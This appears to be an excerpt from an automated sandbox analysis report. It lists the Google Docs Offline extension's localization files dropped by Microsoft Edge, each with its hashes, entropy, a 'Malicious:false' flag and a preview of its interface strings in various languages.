                                                                                                                                                                                                                                                                                                        SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):977
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                        MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                        SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                        SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                        SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                        Encrypted:false
